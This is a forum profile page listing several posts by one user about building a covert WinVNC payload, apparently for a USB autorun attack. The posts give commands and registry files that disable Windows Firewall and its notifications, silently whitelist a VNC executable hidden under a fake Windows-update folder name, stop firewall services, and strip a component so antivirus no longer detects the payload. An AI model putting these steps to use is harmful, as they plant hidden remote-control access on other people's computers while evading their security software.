Jump to content

remkow

Active Members
  • Posts

    205
  • Joined

  • Last visited

Posts posted by remkow

  1. I'm not using Windows Firewall myself, but I think that this should disable it:

    netsh firewall set opmode disable

    And to prevent the security center from popping up use this registry file:

    Windows Registry Editor Version 5.00
    
    
    
    [HKEY_LOCAL_MACHINESOFTWAREMicrosoftSecurity Center]
    
    "FirewallDisableNotify"=dword:00000001

  2. You don't have to disable the windows firewall, just add some registry entries and ur set. When using the WinVNC payload, you only have to add this registry file:

    Windows Registry Editor Version 5.00
    
    
    
    [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccessParametersFirew
    allPolicyStandardProfileAuthorizedApplicationsList]
    
    "%systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$WinVNC.exe"="%systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$WinVNC.exe:*:Enabled:WinVnc"
    
    "%appdata%NtUninstallKB21050c07160c070f0b0a0a05031b05WinVNC.exe"="%appdata%NtUninstallK21050c07160c070f0b0a0a05031b05WinVNC.exe:*:Enabled:WinVnc"

    Just save it as vnc.reg, and in your go.cmd import it using "reg import vnc.reg" or "regedit /s vnc.reg".

  3. You can just disable the firewall processes with tskill. If you know the exact service name of the firewall, you can stop it by using net stop [name]. For instance, I can kill my Sygate firewall by using "net stop smcservice"

  4. Yeah sure. I used regmon to to check what registry entries were created when the services.exe would be used, and I saw that they were exactly the same as those in vncdmp2.reg, meaning that the entire services.exe component was not necessary..

    So I deleted services.exe, and removed it from services.bat in the VNCInstallfiles dir. I tried it out, and it worked just like it used to, without my antivirus going crazy :D

  5. I saw that a program called services.exe installs the WinVNC app as a service. My question is, what does it exactly do, and is the source code available?

    This is because I am making my own payload, and services.exe is the only program that is still detected by my AV (trying to make a pyload that doesn't need to kill any antiviruses)

    EDIT: i got it working without using services.exe, topic can be locked or whatever

×
×
  • Create New...